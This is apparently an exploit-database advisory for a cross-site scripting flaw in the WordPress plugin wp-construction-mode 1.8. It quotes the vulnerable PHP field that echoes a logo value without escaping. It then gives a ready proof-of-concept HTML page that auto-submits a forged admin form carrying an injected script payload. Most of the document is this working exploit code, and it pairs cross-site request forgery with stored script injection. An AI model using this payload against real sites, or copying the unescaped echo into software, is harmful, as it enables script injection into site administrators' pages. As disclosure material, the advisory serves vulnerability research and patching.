WordPress Construction Mode 1.8 Cross Site Scripting

`######################  
# Exploit Title : Wordpress wp-construction-mode.1.8 Cross Site Scripting  
  
# Exploit Author : Ashiyane Digital Security Team  
  
# Vendor Homepage : http://wordpress.org/plugins/wp-construction-mode  
  
# Software Link :   
http://downloads.wordpress.org/plugin/wp-construction-mode.1.8.zip  
  
# Date : 2014-06-27  
  
# Tested on : Windows 7 / Mozilla Firefox  
######################  
  
# Location : http://localhost/wp-admin/admin.php?page=under-construction.php  
  
######################  
  
# Vulnerable code :  
  
<td><?php _e('Logo') ?></td>  
<td>  
<input type="text" name="wuc_logo" value="<?php echo $wuc_logo ?>"   
placeholder="<?php _e('Enter image path/url or leave blank for no   
logo'); ?>"/>  
</td>  
</tr>  
  
  
######################  
  
Exploit Code:  
  
<html>  
<body>  
<form name="post_form" method="post"   
action="http://localhost/wp-admin/admin.php?page=under-construction.php"   
enctype="multipart/form-data">  
<input type="hidden" name="wuc_logo" value='"/><script>alert(1);</script>'/>  
<script language="Javascript">  
setTimeout('post_form.submit()', 1);  
</script>  
<input type="hidden" name="act" value="save" />  
</form>  
</body>  
</html>  
  
#####################  
  
Discovered By : ACC3SS  
  
#####################  
  
`